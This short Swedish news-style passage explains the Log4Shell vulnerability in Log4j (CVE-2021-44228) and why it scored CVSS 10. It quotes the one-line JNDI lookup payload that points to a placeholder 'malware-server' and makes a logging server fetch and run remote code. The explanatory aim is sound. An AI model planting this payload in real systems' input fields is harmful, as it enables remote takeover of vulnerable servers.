Sårbarheten, kallad “CVE-2021-44228”, fick ett CVSS-poäng på 10, det högsta betyget. Denna höga svårighetspoäng förklaras av det faktum att utnyttjandet är så trivialt, eftersom bara en rad räcker: genom att placera en enkel kommandotyp” ${jndi:ldap://malware-server/resource} på en plats där denna data kommer att loggas av Log4j (t.ex. ett formulär), tvingar angriparen en anslutning till sin server via JNDI för att hämta och exekvera den specificerade resursen, vanligtvis en kommandouppsättning. På så sätt kan han exekvera koden på distans och göra vad han vill på den sårbara servern. Marcus Hutchins, även känd som MalwareTech, publicerade en video som visar sårbarheten.
